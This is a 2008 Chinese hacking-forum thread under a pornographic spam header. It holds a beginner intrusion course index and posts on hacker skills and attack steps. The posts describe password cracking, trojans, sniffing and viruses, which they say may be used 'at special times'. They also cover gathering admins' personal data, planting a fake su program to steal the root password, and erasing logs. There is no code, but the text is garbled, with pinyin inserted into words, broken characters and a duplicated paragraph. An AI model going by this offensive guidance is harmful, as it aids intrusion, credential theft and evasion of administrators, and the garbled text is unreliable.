国产十八禁AV网站,欧美日韩亚洲国产综合乱,亚洲国产aⅴ成人精品无吗,秋霞午夜福利影院合集


       找回密碼
       注冊(cè)

      QQ登錄

      只需一步,快速開(kāi)始

      菜鳥(niǎo)學(xué)習(xí)初級(jí)教程-----強(qiáng)烈推薦

      [復(fù)制鏈接]
      1#
      發(fā)表于 2008-9-25 18:48:27 | 只看該作者 |倒序?yàn)g覽 |閱讀模式
      <H1 class=fl id=subject_tpc>&nbsp;菜鳥(niǎo)學(xué)習(xí)初級(jí)教程-----強(qiáng)烈推薦</H1>+ I) R* h( u9 X5 B
      <DIV class=c id=p_tpc></DIV>& v7 e2 p' s+ j) M9 ]9 [  |' Q
      <DIV class=tpc_content id=read_tpc>我花了一夜時(shí)間整理,可能有些錯(cuò)誤。<BR>由于文章比較多,我也就沒(méi)好細(xì)細(xì)的看,大家諒解下。<BR><BR>終于完了哈,累死我了........(樓數(shù)可能有點(diǎn)錯(cuò)誤,大家請(qǐng)見(jiàn)諒!!)大家可以回復(fù)了!!<BR>基本技能...............................................................................2樓<BR>黑客初級(jí)技術(shù)講解(上)..........................................................3樓<BR>黑客初級(jí)技術(shù)講解(中)..........................................................4樓<BR>黑客初級(jí)技術(shù)講解(下)..........................................................5樓<BR>基礎(chǔ)知識(shí)(1).......................................................................6樓<BR>基礎(chǔ)知識(shí)(2).......................................................................7樓<BR>基礎(chǔ)知識(shí)(3).......................................................................8樓<BR>基礎(chǔ)知識(shí)(4).......................................................................9樓<BR>基礎(chǔ)知識(shí)(5).....................................................................10樓<BR>基礎(chǔ)知識(shí)(6).....................................................................11樓<BR>初級(jí)技術(shù).............................................................................12樓<BR>黑客兵器之木馬篇(上)........................................................13樓<BR>黑客兵器之木馬篇(下)........................................................14樓<BR>黑客兵器之掃描篇(上)........................................................15樓<BR><BR>第2頁(yè)<BR><BR>黑客兵器之掃描篇(下)........................................................16樓<BR>代理、肉雞、跳板的概念........................................................17樓<BR>網(wǎng)絡(luò)監(jiān)聽(tīng)概念.......................................................................18樓<BR>系統(tǒng)進(jìn)程信息.......................................................................19樓<BR>端口全解析(上).................................................................20樓<BR>端口全解析(下).................................................................21樓<BR>端口詳細(xì)說(shuō)明表(上)...........................................................22樓<BR>端口詳細(xì)說(shuō)明表(下)...........................................................23樓<BR>菜鳥(niǎo)進(jìn)階(1).....................................................................24樓<BR>...........................<BR>菜鳥(niǎo)進(jìn)階(7).....................................................................30樓<BR><BR>第3頁(yè)<BR><BR>菜鳥(niǎo)進(jìn)階(8).....................................................................31樓<BR>菜鳥(niǎo)進(jìn)階(9).....................................................................32樓<BR>1-32樓教程下載....................................................................33樓<BR>木馬防范及一些端口的關(guān)閉(上)............................................34樓<BR>木馬防范及一些端口的關(guān)閉(下)............................................35樓<BR>黑客竊取密碼及防范..............................................................36樓<BR>SSL.TLS.WTLS原理(上).....................................................37樓<BR>SSL.TLS.WTLS原理(下).....................................................38樓<BR>關(guān)于MAC地址和IP地址的知識(shí)..................................................39樓<BR>術(shù)語(yǔ)表(1)........................................................................40樓<BR>.........................<BR>術(shù)語(yǔ)表(4)........................................................................44樓<BR>34樓-44樓內(nèi)容下載...............................................................45樓<BR><BR>第4頁(yè)<BR>個(gè)人電腦安全.......................................................................46樓<BR>網(wǎng)絡(luò)安全知識(shí)(1)...............................................................47樓<BR>........................<BR>網(wǎng)絡(luò)安全知識(shí)(7)...............................................................53樓<BR>防范非系統(tǒng)用戶破壞..............................................................54樓<BR>44-54樓內(nèi)容下載..................................................................55樓<BR>黑客掃描特征及易受攻擊端口..................................................56樓<BR>開(kāi)始..運(yùn)行..命令集合.............................................................57樓<BR>PING命令及使用技巧.............................................................58樓<BR>GHOST詳細(xì)解說(shuō)(1)...........................................................59樓<BR>GHOST詳細(xì)解說(shuō)(2)...........................................................60樓<BR><BR>第5頁(yè)<BR><BR>GHOST詳細(xì)解說(shuō)(3)...........................................................61樓<BR>56樓到61樓內(nèi)容下載.............................................................62樓<BR>ipc$詳細(xì)解說(shuō)大全(1)..........................................................63樓<BR>..............................<BR>ipc$詳細(xì)解說(shuō)大全(5)..........................................................67樓<BR>I P C $ 入 侵圖文結(jié)合............................................................68樓<BR>常見(jiàn)ASP腳本攻擊及防范技巧...................................................69樓<BR>37秒迅速破解網(wǎng)吧.................................................................70樓<BR>開(kāi)啟3389的5種方法(上)......................................................71樓<BR>開(kāi)啟3389的5種方法(下)......................................................71樓<BR>網(wǎng)絡(luò)常見(jiàn)攻擊及防范手冊(cè)(上)................................................73樓<BR>網(wǎng)絡(luò)常見(jiàn)攻擊及防范手冊(cè)(下)................................................74樓<BR>DOS攻擊原理及方法介紹.........................................................75樓<BR><BR>第6頁(yè)<BR><BR>如何突破各種防火墻..............................................................76樓<BR>蠕蟲(chóng)技術(shù)(上)....................................................................77樓<BR>蠕蟲(chóng)技術(shù)(中)....................................................................78樓<BR>蠕蟲(chóng)技術(shù)(下)....................................................................79樓<BR>殼(上).............................................................................80樓<BR>殼(下).............................................................................81樓<BR>簡(jiǎn)單黑客工具使用.................................................................82樓<BR>淺談綁定之應(yīng)用....................................................................83樓<BR>永遠(yuǎn)的后門(mén)..........................................................................84樓<BR>入門(mén)者如何獲得肉雞..............................................................85樓<BR>流光的使用方法....................................................................86樓<BR>玩木馬................................................................................87樓<BR>溢出專集.............................................................................88樓<BR>NET START可以起用命令一覽表(上).....................................89樓<BR>NET START可以起用命令一覽表(下).....................................90樓</DIV>
      2#
       樓主| 發(fā)表于 2008-9-25 18:48:49 | 只看該作者
      <DIV class=tpc_content id=read_486>一個(gè)黑客的基本技能<BR><BR>1、黑客的精神態(tài)度是很重要的,但技術(shù)則更是重要。黑客的態(tài)度雖然是無(wú)可取代,隨著新科技的發(fā)明和舊技術(shù)的取代,這些工具隨時(shí)間在慢慢的改變。例如:以往總是會(huì)學(xué)會(huì)用機(jī)器碼寫(xiě)程序,直到最近我們開(kāi)始使用HTML。不過(guò),在1996年末,當(dāng)然,這是基礎(chǔ)的hacking技能。在1997年,理所當(dāng)然的,你必須學(xué)會(huì)C。 但,如果你只是學(xué)一種語(yǔ)言,那么你不能算是一位黑客,了不起只能算是一個(gè)programmer。除此,你還必須學(xué)會(huì)學(xué)會(huì)以獨(dú)立于任何程序語(yǔ)言之上的概括性觀念來(lái)思考一件程序設(shè)計(jì)上的問(wèn)題。要成為一位真正的黑客,你必須要能在幾天之內(nèi)將manual內(nèi)容和你目前己經(jīng)知道的關(guān)連起學(xué)會(huì)一種新的語(yǔ)言。也就是說(shuō),你必會(huì)學(xué)還了C之外的東西,你至少還要會(huì)LISP或Perl(Java也正在努力的擠上這個(gè)名單; 譯者注: 我很懷疑這份名單)。除了幾個(gè)重要的hacking常用語(yǔ)言之外,這些語(yǔ)言提供你一些不同的程序設(shè)計(jì)途徑,并且讓你在好的方法中學(xué)習(xí)。 <BR><BR>程序設(shè)計(jì)是一種復(fù)雜的技術(shù),我沒(méi)辨法在這提供完整的學(xué)習(xí)步驟。但是我能告訴你一些在書(shū)本上和課堂上所沒(méi)有的東西(有很多,幾乎全部最好的黑客們都是自習(xí)而來(lái)的)。(a) 讀別人的程序碼;(寫(xiě)程序,這兩項(xiàng)是不錯(cuò)的方法。學(xué)習(xí)寫(xiě)程序就像在學(xué)習(xí)寫(xiě)一種良好的自然語(yǔ)言,最好的方法是去看一些專家們所寫(xiě)的東西,然后寫(xiě)一些你自己的東西,然后讀更多,再寫(xiě)更多。然后一直持續(xù),一直到你發(fā)展出一種屬于自己的風(fēng)格和特色。要找到好的程序碼來(lái)看是很一件很困難的事,因?yàn)?,?duì)菜鳥(niǎo)黑客們而言,適于供他們閱讀和努力的大型程序的source數(shù)量很少。但這事己有了戲劇性的變化了; 現(xiàn)在免費(fèi)的供應(yīng)的軟件、程序設(shè)計(jì)工具和操作系統(tǒng)(大都公開(kāi)提供 source,而且全都是由黑客們寫(xiě)成的)到處可看。進(jìn)入下一個(gè)主題。 <BR><BR>2、取得一個(gè)免費(fèi)的 UNIX,并學(xué)習(xí)使用和維護(hù)。我先假設(shè)你己經(jīng)有一部個(gè)人電腦或者是可以使用任何一部(現(xiàn)在的小孩子真幸福,可如此輕易的擁有 :-))。 取得黑客技巧的第一個(gè)步驟是取得一份Linux 或者一份免費(fèi)的 BSD-Unix,并將它安裝在自己的機(jī)器,并使之順利的運(yùn)作。沒(méi)錯(cuò),在這個(gè)世界上除了Unix之外,還有其它的操作系統(tǒng)。但是他們只提供bianry,你不能看到他們的程序碼,你也不能修改他們。想要在DOS或Windows或MacOS開(kāi)始hacking,無(wú)疑就是要你綁著枷鎖跳舞一樣。 <BR><BR>除此之外,Unix是Internet上的操作系統(tǒng)。當(dāng)你在不懂Unix的情況下學(xué)習(xí)使用Internet時(shí),你沒(méi)辨法在不懂Unix的情況下成為Internet的黑客。因?yàn)檫@個(gè)原故,現(xiàn)在的黑客文化還是很牢固的以Unix為中心。(這并不完全是正確的,而且有些活在舊時(shí)代的黑客甚至也不喜歡這種情形,但是Unix和Internet之間的共生共成己經(jīng)到了牢不可破的地步,即使是Microsoft的大塊肌肉也沒(méi)能在上面留下明顯的傷痕。) 因些,把Unix裝起來(lái)吧! (我自己是喜歡Linux,但是還有其它的東東可用。) 學(xué)習(xí)它,讓它運(yùn)作起來(lái),讓它陪你努力精進(jìn)。 用他向整個(gè)Internet喊話??闯绦虼a,改程序。 <BR><BR>有一天你成為一位高竿的黑客,你回頭往后看時(shí)會(huì)發(fā)現(xiàn),你得到比Microsoft操作系統(tǒng)所能提供的還要好的程序設(shè)計(jì)工具(包括 C,Lisp和 Perl)。而且得到快樂(lè),并學(xué)到比共生共成己經(jīng)到了牢不可破的地步,即使是Microsoft的大塊肌肉也沒(méi)能在上面留下明顯的傷痕。) 因些,把Unix裝起來(lái)吧! (我自己是喜歡Linux,但是還有其它的東東可用。) 學(xué)習(xí)它,讓它運(yùn)作起來(lái),讓它陪你努力精進(jìn)。用他向整個(gè)Internet喊話。 看程序碼,改程序。有一天你成為一位高竿的黑客,你回頭往后看時(shí)會(huì)發(fā)現(xiàn),你得到比Microsoft操作系統(tǒng)所能提供的還要好的程序設(shè)計(jì)工具(包括 C,Lisp和 Perl)。而且得到快樂(lè),并 <BR>學(xué)到比你想像中的還要多的知識(shí)。關(guān)于學(xué)習(xí)Unix,在Loginataka有更多的資料。(<A href="http://www.ccil.org/~esr/faqs/loginataka" target=_blank><FONT color=#2f5fa1>http://www.ccil.org/~esr/faqs/loginataka</FONT></A>。) <BR>看一下Linux distribution的目錄或 Linux CD,并把自己交付給它。 <BR><BR>3、學(xué)習(xí)使用World Wide Web并學(xué)會(huì)寫(xiě) HTML。 <BR>在黑客文化創(chuàng)造出來(lái)的東西,大多在他們的活動(dòng)范圍外被使用著,如,在工廠和辨公室或大學(xué)被漠漠的使用著。但Web是一個(gè)很大的例外,這個(gè)黑客眼中的大玩具甚至還被政客們接受,并巧巧的在改變這個(gè)世界。因此(還有很多好的理由),你必須學(xué)習(xí)Web。并不只是學(xué)習(xí)使用browser(這太容易了)而己,還要學(xué)會(huì)寫(xiě)HTML這個(gè)Web的標(biāo)簽語(yǔ)言。如果你不知道如何設(shè)計(jì)程序,寫(xiě)HTML也可以給一些習(xí)慣上的幫助。嗯!! 建立home page吧! 不過(guò),有一個(gè)home page 并沒(méi)任何特別之處能讓你成為一位黑客。Web上到處都是home page,而且大部份都沒(méi)什么重點(diǎn),沒(méi)什么內(nèi)容的爛泥 -- 很好看的爛泥巴,但是看起來(lái)都一樣,差不多。 <BR><BR>4、至少學(xué)會(huì)以下的其中兩種: <BR>一、網(wǎng)站服務(wù)器程序ASP、PHP、CGI、jsP <BR>我個(gè)人認(rèn)為CGI是最難學(xué)的其中一種。 <BR>二、程序語(yǔ)言:C語(yǔ)言、C++、VB、JAVA、PERL、DELPHI、匯編語(yǔ)言 <BR>不過(guò)我認(rèn)為C語(yǔ)言的通用性最好,可以跨平臺(tái)(操作系統(tǒng))使用。 <BR>還要試著自己寫(xiě)程序、開(kāi)發(fā)軟件等工作。 <BR>三、數(shù)據(jù)庫(kù)管理軟件:MYSQL、SQL、FOXPRO……等。 <BR>四、幾種常用的操作系統(tǒng):WIN98、WIN2000、WINNT、WINXP、UNIX、LINUX、要是能學(xué)到UNIX那是最好不過(guò)的了。最最基本的WIN2K、WINNT也要學(xué)會(huì)吧。 <BR>如果以上的你都會(huì)了,那么你已經(jīng)是個(gè)高手了。</DIV>
      3#
       樓主| 發(fā)表于 2008-9-25 18:49:13 | 只看該作者
      <DIV class=tpc_content id=read_487>黑客初級(jí)技術(shù)講解(上)<BR><BR>網(wǎng)絡(luò)安全從其本質(zhì)上來(lái)講就是網(wǎng)絡(luò)上的信息安全。從廣義來(lái)說(shuō),凡是涉及到網(wǎng)絡(luò)上信息的保密性、完整性、可用性、真實(shí)性和可控性的相關(guān)技術(shù)和理論都是網(wǎng)絡(luò)安全的研究領(lǐng)域。確保網(wǎng)絡(luò)系統(tǒng)的信息安全是網(wǎng)絡(luò)安全的目標(biāo),信息安全包括兩個(gè)方面:信息的存 儲(chǔ)安全和信息的傳輸安全。信息的存儲(chǔ)安全是指信息在靜態(tài)存放狀態(tài)下的安全,如是否會(huì)被非授權(quán)調(diào)用等。信息的傳輸安全是指信息在動(dòng)態(tài)傳輸過(guò)程中安全。為了確保網(wǎng)絡(luò)信息的傳輸安全,有以下幾個(gè)問(wèn)題: <BR><BR> ?。ǎ保?duì)網(wǎng)絡(luò)上信息的監(jiān)聽(tīng) <BR> ?。ǎ玻?duì)用戶身份的仿冒 <BR>  (3)對(duì)網(wǎng)絡(luò)上信息的篡改 <BR> ?。ǎ矗?duì)發(fā)出的信息予以否認(rèn) <BR> ?。ǎ担?duì)信息進(jìn)行重發(fā) <BR><BR>  對(duì)于一般的常用入侵方法主要有 <BR><BR>  1.口令入侵 <BR><BR>  所謂口令入侵,就是指用一些軟件解開(kāi)已經(jīng)得到但被人加密的口令文檔,不過(guò)許多黑客已大量采用一種可以繞開(kāi)或屏蔽口令保護(hù)的程序來(lái)完成這項(xiàng)工作。對(duì)于那些可以解開(kāi)或屏蔽口令保護(hù)的程序通常被稱為“Crack”。由于這些軟件的廣為流傳,使得入侵電腦網(wǎng)絡(luò)系統(tǒng)有時(shí)變得相當(dāng)簡(jiǎn)單,一般不需要很深入了解系統(tǒng)的內(nèi)部結(jié)構(gòu),是初學(xué)者的好方法。 <BR><BR>  2.特洛伊木馬術(shù) <BR><BR>  說(shuō)到特洛伊木馬,只要知道這個(gè)故事的人就不難理解,它最典型的做法可能就是把一個(gè)能幫助黑客完成某一特定動(dòng)作的程序依附在某一合法用戶的正常程序中,這時(shí)合法用戶的程序代碼已被該變。一旦用戶觸發(fā)該程序,那么依附在內(nèi)的黑客指令代碼同時(shí)被激活,這些代碼往往能完成黑客指定的任務(wù)。由于這種入侵法需要黑客有很好的編程經(jīng)驗(yàn),且要更改代碼、要一定的權(quán)限,所以較難掌握。但正因?yàn)樗膹?fù)雜性,一般的系統(tǒng)管理員很難發(fā)現(xiàn)。 <BR><BR>  3.監(jiān)聽(tīng)法 <BR><BR>  這是一個(gè)很實(shí)用但風(fēng)險(xiǎn)也很大的黑客入侵方法,但還是有很多入侵系統(tǒng)的黑客采用此類方法,正所謂藝高人膽大。 <BR><BR>  網(wǎng)絡(luò)節(jié)點(diǎn)或工作站之間的交流是通過(guò)信息流的轉(zhuǎn)送得以實(shí)現(xiàn),而當(dāng)在一個(gè)沒(méi)有集線器的網(wǎng)絡(luò)中,數(shù)據(jù)的傳輸并沒(méi)有指明特定的方向,這時(shí)每一個(gè)網(wǎng)絡(luò)節(jié)點(diǎn)或工作站都是一個(gè)接口。這就好比某一節(jié)點(diǎn)說(shuō):“嗨!你們中有誰(shuí)是我要發(fā)信息的工作站?!?<BR><BR>  此時(shí),所有的系統(tǒng)接口都收到了這個(gè)信息,一旦某個(gè)工作站說(shuō):“嗨!那是我,請(qǐng)把數(shù)據(jù)傳過(guò)來(lái)。”聯(lián)接就馬上完成。 <BR><BR>  目前有網(wǎng)絡(luò)上流傳著很多嗅探軟件,利用這些軟件就可以很簡(jiǎn)單的監(jiān)聽(tīng)到數(shù)據(jù),甚至就包含口令文件,有的服務(wù)在傳輸文件中直接使用明文傳輸,這也是非常危險(xiǎn)的 <BR>4.E-mail技術(shù) <BR><BR>  使用email加木馬程序這是黑客經(jīng)常使用的一種手段,而且非常奏效,一般的用戶,甚至是網(wǎng)管,對(duì)網(wǎng)絡(luò)安全的意識(shí)太過(guò)于淡薄,這就給很多黑客以可乘之機(jī)。 <BR><BR>  5.病毒技術(shù) <BR>  作為一個(gè)黑客,如此使用應(yīng)該是一件可恥的事情,不過(guò)大家可以學(xué)習(xí),畢竟也是一種攻擊的辦法,特殊時(shí)間,特殊地點(diǎn)完全可以使用。 <BR><BR>  6.隱藏技術(shù) <BR><BR>  網(wǎng)絡(luò)攻擊的一般步驟及實(shí)例 <BR><BR>  攻擊的準(zhǔn)備階段 <BR><BR>  首先需要說(shuō)明的是,入侵者的來(lái)源有兩種,一種是內(nèi)部人員利用自己的工作機(jī)會(huì)和權(quán)限來(lái)獲取不應(yīng)該獲取的權(quán)限而進(jìn)行的攻擊。另一種是外部人員入侵,包括遠(yuǎn)程入侵、網(wǎng)絡(luò)節(jié)點(diǎn)接入入侵等。本節(jié)主要討論遠(yuǎn)程攻擊。 <BR><BR>  進(jìn)行網(wǎng)絡(luò)攻擊是一件系統(tǒng)性很強(qiáng)的工作,其主要工作流程是:收集情報(bào),遠(yuǎn)程攻擊,遠(yuǎn)程登錄,取得普通用戶的權(quán)限,取得超級(jí)用戶的權(quán)限,留下后門(mén),清除日志。主要內(nèi)容包括目標(biāo)分析,文檔獲取,破解密碼,日志清除等技術(shù),下面分別介紹。 <BR><BR>  1.確定攻擊的目的 <BR><BR>  攻擊者在進(jìn)行一次完整的攻擊之前首先要確定攻擊要達(dá)到什么樣的目的,即給對(duì)方造成什么樣的后果。常見(jiàn)的攻擊目的有破壞型和入侵型兩種。破壞型攻擊指的只是破壞攻擊目標(biāo),使其不能正常工作,而不能隨意控制目標(biāo)的系統(tǒng)的運(yùn)行。要達(dá)到破壞型攻擊的目的,主要的手段是拒絕服務(wù)攻擊(Denial Of Service)。另一類常見(jiàn)的攻擊目的是入侵攻擊目標(biāo),這種攻擊是要獲得一定的權(quán)限來(lái)達(dá)到控制攻擊目標(biāo)的目的。應(yīng)該說(shuō)這種攻擊比破壞型攻擊更為普遍,威脅性也更大。因?yàn)楹诳鸵坏┇@取攻擊目標(biāo)的管理員權(quán)限就可以對(duì)此服務(wù)器做任意動(dòng)作,包括破壞性的攻擊。此類攻擊一般也是利用服務(wù)器操作系統(tǒng)、應(yīng)用軟件或者網(wǎng)絡(luò)協(xié)議存在的漏洞進(jìn)行的。當(dāng)然還有另一種造成此種攻擊的原因就是密碼泄露,攻擊者靠猜測(cè)或者窮舉法來(lái)得到服務(wù)器用戶的密碼,然后就可以用和真正的管理員一樣對(duì)服務(wù)器進(jìn)行訪問(wèn)。 <BR><BR>  2.信息收集 <BR><BR>  除了確定攻擊目的之外,攻擊前的最主要工作就是收集盡量多的關(guān)于攻擊目標(biāo)的信息。這些信息主要包括目標(biāo)的操作系統(tǒng)類型及版本,目標(biāo)提供哪些服務(wù),各服務(wù)器程序的類型與版本以及相關(guān)的社會(huì)信息。 <BR><BR>  要攻擊一臺(tái)機(jī)器,首先要確定它上面正在運(yùn)行的操作系統(tǒng)是什么,因?yàn)閷?duì)于不同類型的操作系統(tǒng),其上的系統(tǒng)漏洞有很大區(qū)別,所以攻擊的方法也完全不同,甚至同一種操作系統(tǒng)的不同版本的系統(tǒng)漏洞也是不一樣的。要確定一臺(tái)服務(wù)器的操作系統(tǒng)一般是靠經(jīng)驗(yàn),有些服務(wù)器的某些服務(wù)顯示信息會(huì)泄露其操作系統(tǒng)。例如當(dāng)我們通過(guò)TELNET連上一臺(tái)機(jī)器時(shí),如果顯示 <BR><BR>  Unix(r)System V Release 4.0 <BR>  login: <BR><BR>  那么根據(jù)經(jīng)驗(yàn)就可以確定這個(gè)機(jī)器上運(yùn)行的操作系統(tǒng)為SUN OS 5.5或5.5.l。但這樣確定操作系統(tǒng)類型是不準(zhǔn)確的,因?yàn)橛行┚W(wǎng)站管理員為了迷惑攻擊者會(huì)故意更改顯示信息,造成假象。 <BR>還有一種不是很有效的方法,諸如查詢DNS的主機(jī)信息(不是很可靠)來(lái)看登記域名時(shí)的申請(qǐng)機(jī)器類型和操作系統(tǒng)類型,或者使用社會(huì)工程學(xué)的方法來(lái)獲得,以及利用某些主機(jī)開(kāi)放的SNMP的公共組來(lái)查詢。 <BR><BR>  另外一種相對(duì)比較準(zhǔn)確的方法是利用網(wǎng)絡(luò)操作系統(tǒng)里的TCP/IP堆棧作為特殊的“指紋”來(lái)確定系統(tǒng)的真正身份。因?yàn)椴煌牟僮飨到y(tǒng)在網(wǎng)絡(luò)底層協(xié)議的各種實(shí)現(xiàn)細(xì)節(jié)上略有不同??梢酝ㄟ^(guò)遠(yuǎn)程向目標(biāo)發(fā)送特殊的包,然后通過(guò)返回的包來(lái)確定操作系統(tǒng)類型。例如通過(guò)向目標(biāo)機(jī)發(fā)送一個(gè)FIN的包(或者是任何沒(méi)有ACK或SYN標(biāo)記的包)到目標(biāo)主機(jī)的一個(gè)開(kāi)放的端口然后等待回應(yīng)。許多系統(tǒng)如windows、 BSDI、 CISCO、 HP/UX和 IRIX會(huì)返回一個(gè)RESET。通過(guò)發(fā)送一個(gè)SYN包,它含有沒(méi)有定義的TCP標(biāo)記的TCP頭。那么在Linux系統(tǒng)的回應(yīng)包就會(huì)包含這個(gè)沒(méi)有定義的標(biāo)記,而在一些別的系統(tǒng)則會(huì)在收到SYN+BOGU包之后關(guān)閉連接?;蚴抢脤ふ页跏蓟蛄虚L(zhǎng)度模板與特定的操作系統(tǒng)相匹配的方法。利用它可以對(duì)許多系統(tǒng)分類,如較早的Unix系統(tǒng)是64K長(zhǎng)度,一些新的Unix系統(tǒng)的長(zhǎng)度則是隨機(jī)增長(zhǎng)。還有就是檢查返回包里包含的窗口長(zhǎng)度,這項(xiàng)技術(shù)根據(jù)各個(gè)操作系統(tǒng)的不同的初始化窗口大小來(lái)唯一確定它們。利用這種技術(shù)實(shí)現(xiàn)的工具很多,比較著名的有NMAP、CHECKOS、QUESO等。 <BR><BR>  獲知目標(biāo)提供哪些服務(wù)及各服務(wù)daemon的類型、版本同樣非常重要,因?yàn)橐阎穆┒匆话愣际菍?duì)某一服務(wù)的。這里說(shuō)的提供服務(wù)就是指通常我們提到的喘口,例如一般TELNET在23端口,F(xiàn)TP在對(duì)21端口,WWW在80端口或8080端口,這只是一般情況,網(wǎng)站管理完全可以按自己的意愿修改服務(wù)所監(jiān)聽(tīng)的端口號(hào)。在不同服務(wù)器上提供同一種服務(wù)的軟件也可以是不同,我們管這種軟件叫做daemon,例如同樣是提供FTP服務(wù),可以使用wuftp、proftp,ncftp等許多不同種類的daemon。確定daemon的類型版本也有助于黑客利用系統(tǒng)漏洞攻破網(wǎng)站。 <BR><BR>  另外需要獲得的關(guān)于系統(tǒng)的信息就是一些與計(jì)算機(jī)本身沒(méi)有關(guān)系的社會(huì)信息,例如網(wǎng)站所屬公司的名稱、規(guī)模,網(wǎng)絡(luò)管理員的生活習(xí)慣、電話號(hào)碼等。這些信息看起來(lái)與攻擊一個(gè)網(wǎng)站沒(méi)有關(guān)系,實(shí)際上很多黑客都是利用了這類信息攻破網(wǎng)站的。例如有些網(wǎng)站管理員用自己的電話號(hào)碼做系統(tǒng)密碼,如果掌握了該電話號(hào)碼,就等于掌握了管理員權(quán)限進(jìn)行信息收集可以用手工進(jìn)行,也可以利用工具來(lái)完成,完成信息收集的工具叫做掃描器。用掃描器收集信息的優(yōu)點(diǎn)是速度快,可以一次對(duì)多個(gè)目標(biāo)進(jìn)行掃描。 <BR><BR>  攻擊的實(shí)施階段 <BR><BR>  1.獲得權(quán)限 <BR><BR>  當(dāng)收集到足夠的信息之后,攻擊者就要開(kāi)始實(shí)施攻擊行動(dòng)了。作為破壞性攻擊,只需利用工具發(fā)動(dòng)攻擊即可。而作為入侵性攻擊,往往要利用收集到的信息,找到其系統(tǒng)漏洞,然后利用該漏洞獲取一定的權(quán)限。有時(shí)獲得了一般用戶的權(quán)限就足以達(dá)到修改主頁(yè)等目的了,但作為一次完整的攻擊是要獲得系統(tǒng)最高權(quán)限的,這不僅是為了達(dá)到一定的目的,更重要的是證明攻擊者的能力,這也符合黑客的追求。 <BR><BR>  能夠被攻擊者所利用的漏洞不僅包括系統(tǒng)軟件設(shè)計(jì)上的安全漏洞,也包括由于管理配置不當(dāng)而造成的漏洞。前不久,因特網(wǎng)上應(yīng)用最普及的著名www服務(wù)器提供商Apache的主頁(yè)被黑客攻破,其主頁(yè)面上的 Powered by Apache圖樣(羽毛狀的圖畫(huà))被改成了Powered by Microsoft Backoffice的圖樣,那個(gè)攻擊者就是利用了管理員對(duì)Webserver用數(shù)據(jù)庫(kù)的一些不當(dāng)配置而成功取得最高權(quán)限的。</DIV>
      4#
       樓主| 發(fā)表于 2008-9-25 18:49:36 | 只看該作者
      <DIV class=tpc_content id=read_488>黑客初級(jí)技術(shù)講解(中)<BR><BR>  當(dāng)然大多數(shù)攻擊成功的范例還是利用了系統(tǒng)軟件本身的漏洞。造成軟件漏洞的主要原因在于編制該軟件的程序員缺乏安全意識(shí)。當(dāng)攻擊者對(duì)軟件進(jìn)行非正常的調(diào)用請(qǐng)求時(shí)造成緩沖區(qū)溢出或者對(duì)文件的非法訪問(wèn)。其中利用緩沖區(qū)溢出進(jìn)行的攻擊最為普遍,據(jù)統(tǒng)計(jì)80%以上成功的攻擊都是利用了緩沖區(qū)溢出漏洞來(lái)獲得非法權(quán)限的。關(guān)于緩沖區(qū)溢出在后面用專門(mén)章節(jié)來(lái)作詳細(xì)解釋。 <BR><BR>  無(wú)論作為一個(gè)黑客還是一個(gè)網(wǎng)絡(luò)管理員,都需要掌握盡量多的系統(tǒng)漏洞。黑客需要用它來(lái)完成攻擊,而管理員需要根據(jù)不同的漏洞來(lái)進(jìn)行不同的防御措施。了解最新最多的漏洞信息,可以到諸如Rootshell(<A href="http://www.rootshell/" target=_blank><FONT color=#2f5fa1>www.rootshell</FONT></A>.com)、Packetstorm(packetstorm.securify.com)、Securityfocus(<A href="http://www.securityfocus/" target=_blank><FONT color=#2f5fa1>www.securityfocus</FONT></A>.com)等網(wǎng)站去查找。 <BR><BR>  2.權(quán)限的擴(kuò)大 <BR><BR>  系統(tǒng)漏洞分為遠(yuǎn)程漏洞和本地漏洞兩種,遠(yuǎn)程漏洞是指黑客可以在別的機(jī)器上直接利用該漏洞進(jìn)行攻擊并獲取一定的權(quán)限。這種漏洞的威脅性相當(dāng)大,黑客的攻擊一般都是從遠(yuǎn)程漏洞開(kāi)始的。但是利用遠(yuǎn)程漏洞獲取的不一定是最高權(quán)限,而往往只是一個(gè)普通用戶的權(quán)限,這樣常常沒(méi)有辦法做黑客們想要做的事。這時(shí)就需要配合本地漏洞來(lái)把獲得的權(quán)限進(jìn)行擴(kuò)大,常常是擴(kuò)大至系統(tǒng)的管理員權(quán)限。 <BR>只有獲得了最高的管理員權(quán)限之后,才可以做諸如網(wǎng)絡(luò)監(jiān)聽(tīng)、打掃痕跡之類的事情。要完成權(quán)限的擴(kuò)大,不但可以利用已獲得的權(quán)限在系統(tǒng)上執(zhí)行利用本地漏洞的程序,還可以放一些木馬之類的欺騙程序來(lái)套取管理員密碼,這種木馬是放在本地套取最高權(quán)限用的,而不能進(jìn)行遠(yuǎn)程控制。例如一個(gè)黑客已經(jīng)在一臺(tái)機(jī)器上獲得了一個(gè)普通用戶的賬號(hào)和登錄權(quán)限,那么他就可以在這臺(tái)機(jī)器上放置一個(gè)假的su程序。一旦黑客放置了假su程序,當(dāng)真正的合法用戶登錄時(shí),運(yùn)行了su,并輸入了密碼,這時(shí)root密碼就會(huì)被記錄下來(lái),下次黑客再登錄時(shí)就可以使用su變成root了。 <BR><BR>  攻擊的善后工作 <BR><BR>  1.日志系統(tǒng)簡(jiǎn)介 <BR><BR>  如果攻擊者完成攻擊后就立刻離開(kāi)系統(tǒng)而不做任何善后工作,那么他的行蹤將很快被系統(tǒng)管理員發(fā)現(xiàn),因?yàn)樗械木W(wǎng)絡(luò)操作系統(tǒng)一般都提供日志記錄功能,會(huì)把系統(tǒng)上發(fā)生的動(dòng)作記錄下來(lái)。所以,為了自身的隱蔽性,黑客一般都會(huì)抹掉自己在日志中留下的痕跡。想要了解黑客抹掉痕跡的方法,首先要了解常見(jiàn)的操作系統(tǒng)的日志結(jié)構(gòu)以及工作方式。Unix的日志文件通常放在下面這幾個(gè)位置,根據(jù)操作系統(tǒng)的不同略有變化 <BR><BR> ?。痷sr/adm——早期版本的Unix。 <BR>  /Var/adm新一點(diǎn)的版本使用這個(gè)位置。 <BR>  /Varflort一些版本的Solaris、 Linux BSD、 Free BSD使用這個(gè)位置。 <BR> ?。痚tc,大多數(shù)Unix版本把Utmp放在此處,一些Unix版本也把Wtmp放在這里,這也是Syslog.conf的位置。 <BR><BR>  下面的文件可能會(huì)根據(jù)你所在的目錄不同而不同: <BR><BR>  acct或pacct-一記錄每個(gè)用戶使用的命令記錄。 <BR>  accesslog主要用來(lái)服務(wù)器運(yùn)行了NCSA HTTP服務(wù)器,這個(gè)記錄文件會(huì)記錄有什么站點(diǎn)連接過(guò)你的服務(wù)器。 <BR>  aculo保存撥出去的Modems記錄。 <BR>  lastlog記錄了最近的Login記錄和每個(gè)用戶的最初目的地,有時(shí)是最后不成功Login的記錄。 <BR>  